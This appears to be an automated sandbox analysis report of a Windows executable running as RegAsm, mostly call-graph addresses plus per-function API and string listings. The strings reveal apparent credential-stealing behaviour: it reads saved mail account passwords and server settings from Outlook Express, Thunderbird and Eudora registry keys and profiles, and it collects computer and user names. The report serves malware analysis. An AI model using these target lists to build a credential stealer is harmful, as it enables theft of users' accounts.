RegCloseKey 33873 403033 33871->33873 33873->33865 33873->33866 33873->33869 33873->33871 33874 410b62 RegEnumKeyExA 33873->33874 34062 402db3 26 API calls 33873->34062 33874->33873 33876 4032d5 33875->33876 33877 4033a9 33875->33877 34063 4021b6 memset 33876->34063 33890 4034e4 memset memset 33877->33890 33879 4032e1 34064 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33879->34064 33881 4032ea 33882 4032f8 memset GetPrivateProfileSectionA 33881->33882 34065 4023e5 16 API calls 33881->34065 33882->33877 33887 40332f 33882->33887 33884 40339b strlen 33884->33877 33884->33887 33886 403350 strchr 33886->33887 33887->33877 33887->33884 34066 4021b6 memset 33887->34066 34067 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33887->34067 34068 4023e5 16 API calls 33887->34068 33891 410b1e 3 API calls 33890->33891 33892 40353f 33891->33892 33893 40357f 33892->33893 33894 403546 _mbscpy 33892->33894 33898 403985 33893->33898 34069 406d55 strlen _mbscat 33894->34069 33896 403565 _mbscat 34070 4033f0 19 API calls 33896->34070 34071 40466b _mbscpy 33898->34071 33900 4039aa 33904 4039ff 33900->33904 34072 40f460 memset memset 33900->34072 34093 40f6e2 33900->34093 34109 4038e8 21 API calls 33900->34109 33905 404785 FreeLibrary 33904->33905 33906 403a0b 33905->33906 33907 4037ca memset memset 33906->33907 34117 444551 memset 33907->34117 33910 4038e2 33910->33756 33970 40f334 324 API calls 33910->33970 33912 40382e 33913 406f06 2 API calls 33912->33913 33914 403843 33913->33914 33915 406f06 2 API calls 33914->33915 33916 403855 strchr 33915->33916 33917 403884 _mbscpy 33916->33917 33918 403897 strlen 33916->33918 33919 4038bf _mbscpy 33917->33919 33918->33919 33920 4038a4 sprintf 33918->33920 34129 4023e5 16 API calls 33919->34129 33920->33919 33923 44b090 33922->33923 33924 40fb10 RegOpenKeyExA 33923->33924 33925 403e7f 33924->33925 33926 40fb3b 33924->33926 33936 40f96c 33925->33936 33927 40fb55 RegQueryValueExA 33926->33927 33928 40fc2d RegCloseKey 33926->33928 33929 40fc23 RegCloseKey 33927->33929 33930 40fb84 33927->33930 33928->33925 33929->33928 33931 404734 2 API calls 33930->33931 33932 40fb91 33931->33932 33932->33929 33933 40fc19 LocalFree 33932->33933 33934 40fbdd memcpy memcpy 33932->33934 33933->33929 34134 40f802 9 API calls 33934->34134 33937 4070ae GetVersionExA 33936->33937 33938 40f98d 33937->33938 33939 4045db 2 API calls 33938->33939 33947 40f9a9 33939->33947 33940 40fae6 33941 404656 FreeLibrary 33940->33941 33942 403e85 33941->33942 33948 4442ea memset 33942->33948 33943 40fa13 memset WideCharToMultiByte 33944 40fa43 _strnicmp 33943->33944 33943->33947 33945 40fa5b WideCharToMultiByte 33944->33945 33944->33947 33946 40fa88 WideCharToMultiByte 33945->33946 33945->33947 33946->33947 33947->33940 33947->33943 33949 410dbb 9 API calls 33948->33949 33950 444329 33949->33950 34135 40759e strlen strlen 33950->34135 33955 410dbb 9 API calls 33956 444350 33955->33956 33957 40759e 3 API calls 33956->33957 33958 44435a 33957->33958 33959 444212 65 API calls 33958->33959 33960 444366 memset memset 33959->33960 33961 410b1e 3 API calls 33960->33961 33962 4443b9 ExpandEnvironmentStringsA strlen 33961->33962 33963 4443f4 _strcmpi 33962->33963 33964 4443e5 33962->33964 33965 403e91 33963->33965 33966 44440c 33963->33966 33964->33963 33965->33535 33967 444212 65 API calls 33966->33967 33967->33965 33968->33718 33969->33722 33970->33756 33971->33757 33973 40370e 33972->33973 33974 41088d 33972->33974 33973->33772 33973->33773 33974->33973 33975 4108be memcpy CoTaskMemFree 33974->33975 33975->33973 33976->33776 33977->33772 33979 40841c 33978->33979 33980 410a9c RegOpenKeyExA 33979->33980 33980->33785 33981->33791 33982->33791 33983->33795 33984->33797 33985->33791 33986->33800 33987->33804 33988->33804 33989->33809 33990->33804 33992 404656 FreeLibrary 33991->33992 33993 4045e3 LoadLibraryA 33992->33993 33994 404643 33993->33994 33995 4045f4 33993->33995 33994->33814 33994->33816 33994->33818 33995->33994 33996 404656 FreeLibrary 33995->33996 33996->33994 33998 403cd2 33997->33998 33999 40465c FreeLibrary 33997->33999 33998->33827 33999->33998 34000->33824 34001->33831 34002->33845 34003->33839 34004->33845 34005->33845 34006->33840 34007->33845 34008->33853 34009->33853 34019 410b62 RegEnumKeyExA 34010->34019 34012 402ad0 34013 402b15 RegCloseKey 34012->34013 34017 402b14 34012->34017 34020 410a9c RegOpenKeyExA 34012->34020 34021 402a14 memset 34012->34021 34029 410b62 RegEnumKeyExA 34012->34029 34013->33853 34017->34013 34018->33853 34019->34012 34020->34012 34030 410b62 RegEnumKeyExA 34021->34030 34023 402a93 RegCloseKey 34023->34012 34025 402a48 34025->34023 34031 410a9c RegOpenKeyExA 34025->34031 34032 4027be 34025->34032 34047 410b62 RegEnumKeyExA 34025->34047 34029->34012 34030->34025 34031->34025 34033 40285a memset 34032->34033 34048 4029a2 RegQueryValueExA 34033->34048 34035 402885 34035->34033 34036 402998 RegCloseKey 34035->34036 34054 4021b6 memset 34035->34054 34036->34025 34038 402898 _mbscpy 34039 4029a2 4 API calls 34038->34039 34043 4028d4 34039->34043 34040 4029a2 RegQueryValueExA WideCharToMultiByte strlen memcpy 34040->34043 34041 410ab6 RegQueryValueExA 34041->34043 34043->34040 34043->34041 34055 401989 _mbscpy _mbscat _mbscat 34043->34055 34056 402624 10 API calls 34043->34056 34045 40296d _mbscpy 34057 4023e5 16 API calls 34045->34057 34047->34025 34049 4029f2 34048->34049 34050 4029dd 34048->34050 34049->34035 34051 4029f7 WideCharToMultiByte 34050->34051 34052 4029e9 34050->34052 34051->34049 34053 406f06 2 API calls 34052->34053 34053->34049 34054->34038 34055->34043 34056->34045 34057->34035 34058->33861 34059->33873 34060->33873 34061->33873 34062->33873 34063->33879 34064->33881 34065->33882 34066->33886 34067->33887 34068->33887 34069->33896 34070->33893 34071->33900 34110 4078ba 34072->34110 34075 4078ba _mbsnbcat 34076 40f5a3 RegOpenKeyExA 34075->34076 34077 40f5c3 RegQueryValueExA 34076->34077 34078 40f6d9 34076->34078 34079 40f6d0 RegCloseKey 34077->34079 34080 40f5f0 34077->34080 34078->33900 34079->34078 34080->34079 34090 40f675 34080->34090 34114 40466b _mbscpy 34080->34114 34082 40f611 34084 404734 2 API calls 34082->34084 34088 40f616 34084->34088 34085 40f69e RegQueryValueExA 34085->34079 34087 40f6c1 34085->34087 34086 40f66a 34089 404785 FreeLibrary 34086->34089 34087->34079 34088->34086 34091 40f661 LocalFree 34088->34091 34092 40f645 memcpy 34088->34092 34089->34090 34090->34079 34115 4012ee strlen 34090->34115 34091->34086 34092->34091 34116 40466b _mbscpy 34093->34116 34095 40f6fa 34096 4045db 2 API calls 34095->34096 34097 40f708 34096->34097 34098 40f7e2 34097->34098 34099 404734 2 API calls 34097->34099 34100 404656 FreeLibrary 34098->34100 34104 40f715 34099->34104 34101 40f7f1 34100->34101 34102 404785 FreeLibrary 34101->34102 34103 40f7fc 34102->34103 34103->33900 34104->34098 34105 40f797 WideCharToMultiByte 34104->34105 34106 40f7b8 strlen 34105->34106 34107 40f7d9 LocalFree 34105->34107 34106->34107 34108 40f7c8 _mbscpy 34106->34108 34107->34098 34108->34107 34109->33900 34111 4078e6 34110->34111 34112 4078c7 _mbsnbcat 34111->34112 34113 4078ea 34111->34113 34112->34111 34113->34075 34114->34082 34115->34085 34116->34095 34130 410a9c RegOpenKeyExA 34117->34130 34119 44458b 34120 40381a 34119->34120 34131 410add RegQueryValueExA 34119->34131 34120->33910 34128 4021b6 memset 34120->34128 34122 4445a4 34123 4445dc RegCloseKey 34122->34123 34132 410add RegQueryValueExA 34122->34132 34123->34120 34125 4445c1 34125->34123 34133 444879 30 API calls 34125->34133 34127 4445da 34127->34123 34128->33912 34129->33910 34130->34119 34131->34122 34132->34125 34133->34127 34134->33933 34136 4075c9 34135->34136 34137 4075bb _mbscat 34135->34137 34138 444212 34136->34138 34137->34136 34154 407e9d 34138->34154 34141 44424d 34142 444274 34141->34142 34162 444196 34141->34162 34173 407ef8 34141->34173 34143 407e9d 9 API calls 34142->34143 34146 4442a0 34143->34146 34145 407ef8 9 API calls 34145->34146 34146->34145 34147 4442ce 34146->34147 34153 444212 65 API calls 34146->34153 34183 407e62 34146->34183 34187 407f90 34147->34187 34151 407f90 FindClose 34152 4442e4 34151->34152 34152->33955 34153->34146 34155 407f90 FindClose 34154->34155 34156 407eaa 34155->34156 34157 406f06 2 API calls 34156->34157 34158 407ebd strlen strlen 34157->34158 34159 407ee1 34158->34159 34160 407eea 34158->34160 34190 4070e3 strlen _mbscat _mbscpy _mbscat 34159->34190 34160->34141 34191 406d01 CreateFileA 34162->34191 34164 4441a1 34165 44420e 34164->34165 34166 4441aa GetFileSize 34164->34166 34165->34141 34167 444203 CloseHandle 34166->34167 34168 4441bd ??2@YAPAXI SetFilePointer 34166->34168 34167->34165 34192 407560 ReadFile 34168->34192 34170 4441e4 34193 444059 34170->34193 34174 407f03 FindFirstFileA 34173->34174 34175 407f24 FindNextFileA 34173->34175 34176 407f3f 34174->34176 34177 407f46 strlen strlen 34175->34177 34178 407f3a 34175->34178 34176->34177 34182 407f7f 34176->34182 34180 407f76 34177->34180 34177->34182 34179 407f90 FindClose 34178->34179 34179->34176 34224 4070e3 strlen _mbscat _mbscpy _mbscat 34180->34224 34182->34141 34184 407e94 34183->34184 34185 407e6c strcmp 34183->34185 34184->34146 34185->34184 34186 407e83 strcmp 34185->34186 34186->34184 34188 407fa3 34187->34188 34189 407f99 FindClose 34187->34189 34188->34151 34189->34188 34190->34160 34191->34164 34192->34170 34194 44b090 34193->34194 34195 444066 wcslen ??2@YAPAXI WideCharToMultiByte 34194->34195 34208 44338b 6 API calls 34195->34208 34197 44409f 34198 4440bf strlen 34197->34198 34209 4434fc ??3@YAXPAX ??2@YAPAXI 34198->34209 34200 4440df memcpy 34210 443607 34200->34210 34202 44413d ??3@YAXPAX 34220 443473 9 API calls 34202->34220 34205 406f06 2 API calls 34205->34202 34207 44418f ??3@YAXPAX 34207->34167 34208->34197 34209->34200 34221 407948 free free 34210->34221 34212 443639 34222 407948 free free 34212->34222 34214 44391c 34214->34202 34214->34205 34215 407a1f 4 API calls 34217 443644 34215->34217 34216 443528 19 API calls 34216->34217 34217->34214 34217->34215 34217->34216 34218 44379d memcpy 34217->34218 34223 442d8e 9 API calls 34217->34223 34218->34217 34220->34207 34221->34212 34222->34217 34223->34217 34224->34182 34225->33550 34226->33554 34227->33561 34228->33560 34229->33567 34230->33564 34231->33559 34249 411853 RtlInitializeCriticalSection memset 34250 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34425 40a256 13 API calls 34427 432e5b 17 API calls 34429 43fa5a 20 API calls 34252 401060 41 API calls 34432 427260 CloseHandle memset memset 34256 410c68 FindResourceA SizeofResource LoadResource LockResource 34434 405e69 13 API calls 34258 433068 15 API calls __fprintf_l 34436 414a6d 18 API calls 34437 43fe6f 134 API calls 34260 424c6d 15 API calls __fprintf_l 34438 426741 19 API calls 34262 440c70 17 API calls 34263 443c71 43 API calls 34266 427c79 24 API calls 34441 416e7e memset __fprintf_l 34270 42800b 47 API calls 34271 425115 85 API calls __fprintf_l 34444 41960c 61 API calls 34272 43f40c 122 API calls __fprintf_l 34275 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34276 43f81a 20 API calls 34278 414c20 memset memset 34279 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34448 414625 18 API calls 34449 404225 modf 34450 403a26 strlen WriteFile 34452 40422a 12 API calls 34456 427632 memset memset memcpy 34457 40ca30 59 API calls 34458 404235 26 API calls 34280 42ec34 61 API calls __fprintf_l 34281 425115 76 API calls __fprintf_l 34459 425115 77 API calls __fprintf_l 34461 44223a 38 API calls 34287 43183c 112 API calls 34462 44b2c5 _onexit __dllonexit 34467 42a6d2 memcpy __allrem 34289 405cda 65 API calls 34475 43fedc 138 API calls 34476 4116e1 16 API calls __fprintf_l 34292 4244e6 19 API calls 34294 42e8e8 127 API calls __fprintf_l 34295 4118ee RtlLeaveCriticalSection 34481 43f6ec 22 API calls 34297 425115 119 API calls __fprintf_l 34298 410cf3 EnumResourceNamesA 34484 4492f0 memcpy memcpy 34486 43fafa 18 API calls 34488 4342f9 15 API calls __fprintf_l 34299 4144fd 19 API calls 34490 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34491 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34494 443a84 _mbscpy 34496 43f681 17 API calls 34302 404487 22 API calls 34498 415e8c 16 API calls __fprintf_l 34306 411893 RtlDeleteCriticalSection __fprintf_l 34307 41a492 42 API calls 34502 403e96 34 API calls 34503 410e98 memset SHGetPathFromIDList SendMessageA 34309 426741 109 API calls __fprintf_l 34310 4344a2 18 API calls 34311 4094a2 10 API calls 34506 4116a6 15 API calls __fprintf_l 34507 43f6a4 17 API calls 34508 440aa3 20 API calls 34510 427430 45 API calls 34314 4090b0 7 API calls 34315 4148b0 15 API calls 34317 4118b4 RtlEnterCriticalSection 34318 4014b7 CreateWindowExA 34319 40c8b8 19 API calls 34321 4118bf RtlTryEnterCriticalSection 34515 42434a 18 API calls __fprintf_l 34517 405f53 12 API calls 34329 43f956 59 API calls 34331 40955a 17 API calls 34332 428561 36 API calls 34333 409164 7 API calls 34521 404366 19 API calls 34525 40176c ExitProcess 34528 410777 42 API calls 34338 40dd7b 51 API calls 34339 425d7c 16 API calls __fprintf_l 34530 43f6f0 25 API calls 34531 42db01 22 API calls 34340 412905 15 API calls __fprintf_l 34532 403b04 54 API calls 34533 405f04 SetDlgItemTextA GetDlgItemTextA 34534 44b301 ??3@YAXPAX 34537 4120ea 14 API calls 3 library calls 34538 40bb0a 8 API calls 34540 413f11 strcmp 34344 434110 17 API calls __fprintf_l 34347 425115 108 API calls __fprintf_l 34541 444b11 _onexit 34349 425115 76 API calls __fprintf_l 34352 429d19 10 API calls 34544 444b1f __dllonexit 34545 409f20 _strcmpi 34354 42b927 31 API calls 34548 433f26 19 API calls __fprintf_l 34549 44b323 FreeLibrary 34550 427f25 46 API calls 34551 43ff2b 17 API calls 33219 444b36 33222 444b10 33219->33222 33221 444b3f 33223 444b1f __dllonexit 33222->33223 33224 444b19 _onexit 33222->33224 33223->33221 33224->33223 34552 43fb30 19 API calls 34361 414d36 16 API calls 34363 40ad38 7 API calls 34554 433b38 16 API calls __fprintf_l 34232 44b33b 34233 44b344 ??3@YAXPAX 34232->34233 34234 44b34b 34232->34234 34233->34234 34235 44b354 ??3@YAXPAX 34234->34235 34236 44b35b 34234->34236 34235->34236 34237 44b364 ??3@YAXPAX 34236->34237 34238 44b36b 34236->34238 34237->34238 34239 44b374 ??3@YAXPAX 34238->34239 34240 44b37b 34238->34240 34239->34240 34367 426741 21 API calls 34368 40c5c3 124 API calls 34370 43fdc5 17 API calls 34555 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34373 4161cb memcpy memcpy memcpy memcpy 33234 44b3cf 33235 44b3e6 33234->33235 33237 44b454 33234->33237 33235->33237 33241 44b40e 33235->33241 33238 44b405 33238->33237 33239 44b435 VirtualProtect 33238->33239 33239->33237 33240 44b444 VirtualProtect 33239->33240 33240->33237 33242 44b413 33241->33242 33247 44b454 33242->33247 33248 44b42b 33242->33248 33244 44b41c 33245 44b435 VirtualProtect 33244->33245 33244->33247 33246 44b444 VirtualProtect 33245->33246 33245->33247 33246->33247 33249 44b431 33248->33249 33250 44b435 VirtualProtect 33249->33250 33251 44b454 33249->33251 33250->33251 33252 44b444 VirtualProtect 33250->33252 33252->33251 34560 43ffc8 18 API calls 34374 4281cc 15 API calls __fprintf_l 34562 4383cc 110 API calls __fprintf_l 34375 4275d3 41 API calls 34563 4153d3 22 API calls __fprintf_l 34376 444dd7 _XcptFilter 34568 4013de 15 API calls 34570 425115 111 API calls __fprintf_l 34571 43f7db 18 API calls 34574 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34378 4335ee 16 API calls __fprintf_l 34576 429fef 11 API calls 34379 444deb _exit _c_exit 34577 40bbf0 138 API calls 34382 425115 79 API calls __fprintf_l 34581 437ffa 22 API calls 34386 4021ff 14 API calls 34387 43f5fc 149 API calls 34582 40e381 9 API calls 34389 405983 40 API calls 34390 42b186 27 API calls __fprintf_l 34391 427d86 76 API calls 34392 403585 20 API calls 34394 42e58e 18 API calls __fprintf_l 34397 425115 75 API calls __fprintf_l 34399 401592 8 API calls 33225 410b92 33228 410a6b 33225->33228 33227 410bb2 33229 410a77 33228->33229 33230 410a89 GetPrivateProfileIntA 33228->33230 33233 410983 memset _itoa WritePrivateProfileStringA 33229->33233 33230->33227 33232 410a84 33232->33227 33233->33232 34586 434395 16 API calls 34401 441d9c memcmp 34588 43f79b 119 API calls 34402 40c599 32 API calls 34589 426741 87 API calls 34406 4401a6 21 API calls 34408 426da6 memcpy memset memset memcpy 34409 4335a5 15 API calls 34411 4299ab memset memset memcpy memset memset 34412 40b1ab 8 API calls 34594 425115 76 API calls __fprintf_l 34598 4113b2 18 API calls 2 library calls 34602 40a3b8 memset sprintf SendMessageA 33253 410bbc 33256 4109cf 33253->33256 33257 4109dc 33256->33257 33258 410a23 memset GetPrivateProfileStringA 33257->33258 33259 4109ea memset 33257->33259 33264 407646 strlen 33258->33264 33269 4075cd sprintf memcpy 33259->33269 33262 410a0c WritePrivateProfileStringA 33263 410a65 33262->33263 33265 40765a 33264->33265 33266 40765c 33264->33266 33265->33263 33268 4076a3 33266->33268 33270 40737c strtoul 33266->33270 33268->33263 33269->33262 33270->33266 34414 40b5bf memset memset _mbsicmp

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 159 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 160 408450-408453 159->160 161 40841c 159->161 163 408484-408488 160->163 164 408455-40845e 160->164 162 408422-40842b 161->162 165 408432-40844e 162->165 166 40842d-408431 162->166 167 408460-408464 164->167 168 408465-408482 164->168 165->160 165->162 166->165 167->168 168->163 168->164
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                                      • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                                      • API String ID: 1832431107-3760989150
                                                                                                                                                                                                                      • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                                                      • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                                                                                      Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407F64
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                                                      • String ID: ACD
                                                                                                                                                                                                                      • API String ID: 379999529-620537770
                                                                                                                                                                                                                      • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                                                      • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                                                                                                                                                      Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                        • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                                                      • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402003
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402086
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402018
                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                                                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileFolderPathSpecialStrings_mbscatatoisprintf
                                                                                                                                                                                                                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                                                      • API String ID: 52128907-4223776976
                                                                                                                                                                                                                      • Opcode ID: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                                                                                                      • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                                                                                                                                                      Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402869
                                                                                                                                                                                                                        • Part of subcall function 004029A2: RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,770145ED,?,00000000), ref: 004028A3
                                                                                                                                                                                                                        • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,770145ED,?,00000000), ref: 0040297B
                                                                                                                                                                                                                        • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                                                      • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                                                      • API String ID: 1497257669-167382505
                                                                                                                                                                                                                      • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                                                      • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                                                                                                                                      Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                                                        • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                                                        • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
